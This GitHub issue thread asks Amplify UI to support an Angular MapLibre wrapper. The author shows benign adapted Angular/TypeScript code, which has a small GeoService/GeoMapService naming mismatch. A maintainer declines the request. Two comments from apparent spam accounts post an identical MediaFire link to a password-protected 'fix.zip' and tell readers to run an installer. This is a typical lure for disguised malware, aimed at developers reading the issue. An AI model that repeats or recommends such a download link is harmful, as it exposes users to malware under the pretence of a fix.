### ISSUE TITLE
implement the maplibre wrapper for Angular

### ISSUE THREAD

**Issue by dataminion** [aws-amplify/amplify-ui#5699]
### On which framework/platform would you like to see this feature implemented?

Angular

### Which UI component is this feature-request for?

Geo (MapView/LocationSearch)

### Please describe your feature-request in detail.

I discovered today that maplibre has an angular wrapper [ngx-maplibre-gl ](https://github.com/maplibre/ngx-maplibre-gl)

This implementation is surprisingly well featured and I was able to get it working using amplify with only some slight modifications. Given the permissive license it could be a powerful addition to amplify for angular. 

### Please describe a solution you'd like.

In order to get the library working I created the following module in my app 

```
-geo
--geo.component
--geo.service
--geo.module
--utils/functions
---object.fn
```

the geo.component was a straight across copy of the [map.component](https://github.com/maplibre/ngx-maplibre-gl/blob/main/projects/ngx-maplibre-gl/src/lib/map/map.component.ts) from the lib then declared in geo.module after testing I ended up with the following changes that will make sense as we go further:

- (line 64) selector: 'mgl-map', => selector: 'app-geo-map',
- (line 81) export class MapComponent => export class GeoComponent
- (line 158) readonly style = input.required<MapOptions['style']>(); => readonly style = input<MapOptions['style']>();
  - this last change is made because Amplify Geo pulls down the style from the authenticated endpoint

The geo.service was a straight across copy of the [map.service](https://github.com/maplibre/ngx-maplibre-gl/blob/main/projects/ngx-maplibre-gl/src/lib/map/map.service.ts) from the lib then declared as an override provider in the geo.module after testing I ended up with the following changes:
- (line 46) import { keepAvailableObjectValues } from '../shared/utils/functions/object.fn'; => import { keepAvailableObjectValues } from './utils/functions/object.fn';
  - unfortunately keepAvailableObjectValues is not an exported member of the main lib so we bring it over

- (line 47) `  import { createMap } from 'maplibre-gl-js-amplify';`

- (line 630) create map is editted heavily to use the amplify 

```
  private createMap(options: MapOptions) {
    NgZone.assertNotInAngularZone();

    const mapOptions = keepAvailableObjectValues<MapOptions>(options);

    this.mapInstance = new Map(mapOptions);

    const isIEorEdge =
      window && /msie\s|trident\/|edge\//i.test(window.navigator.userAgent);
    if (isIEorEdge) {
      this.mapInstance.setStyle(options.style!);
    }
  }
```

Becomes

```
  private createMap(options: MapOptions) {
      NgZone.assertNotInAngularZone();
  
      const mapOptions = keepAvailableObjectValues<MapOptions>(options);
      return createMap({
        container: mapOptions.container, // An HTML Element or HTML element ID to render the map in https://maplibre.org/maplibre-gl-js/docs/API/classes/Map/
        center: mapOptions.center, // [Longitude, Latitude]
        zoom: mapOptions.zoom,      
      }).then(map => {
        
        this.mapInstance = map
        const isIEorEdge =
        window && /msie\s|trident\/|edge\//i.test(window.navigator.userAgent);
      if (isIEorEdge) {
        // this.mapInstance.setStyle(options.style!);
      }
      });
    }
```

in the geo.module we import both the core lib and our component and service this is where the magic happens. By using an override provider we make it so that all of the additional components in the lib that rely on the MapService will now work with our version. 
```

import { MapService, NgxMapLibreGLModule } from '@maplibre/ngx-maplibre-gl'
import { GeoService } from './geo.service'
import { GeoComponent } from './geo.component';

@NgModule({
  declarations: [
    GeoComponent
  ],
  imports: [
    CommonModule,
    NgxMapLibreGLModule,
  ],
  providers: [
    { provide: MapService, useClass: GeoMapService }
  ]
})
export class GeoModule { }
```

Once this was done all I had to do was import my module into any view module or stand alone component and I could customize maps write from my html templates:

```
<app-geo-map
        [zoom]="[13]"
        [center]="[longitude, latitude]"
        [preserveDrawingBuffer]="true"
      >

      <mgl-control
        mglGeolocate
        [positionOptions]="{
          enableHighAccuracy: true
        }"
        [trackUserLocation]="true"
        [showUserLocation]="true"
        (geolocate)="onUserPosition($event)"
      ></mgl-control>

        <mgl-marker
          [lngLat]="[coordinates[0], coordinates[1]]"
          [draggable]="true"
          (markerDragEnd)="onDragEnd($event)"
        ></mgl-marker>
        @if (coordinates) {
          <mgl-control position="bottom-left">
            <mat-card appearance="outlined">
              <div>Longitude:&nbsp;{{ coordinates[0] }}</div>
              <div>Latitude:&nbsp;{{ coordinates[1] }}</div>
            </mat-card>
          </mgl-control>
        }
     </app-geo-map>

```

### We love contributors! Is this something you'd be interested in working on?

- [X] 👋 I may be able to implement this feature request.
- [ ] ⚠️ This feature might incur a breaking change.

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by esauerbo** [comment]
Hey @dataminion thanks for your feature request and for including your implementation! Unfortunately we don't plan to support Geo in Angular at this time, but I'm glad you were able to get something working.

**Comment by dataminion** [comment]
This feature took less than two hours to implement and extended maplibre libraries that amplify-ui already extends. You might as well remove angular support at all and just point people at the generic typescript libraries.
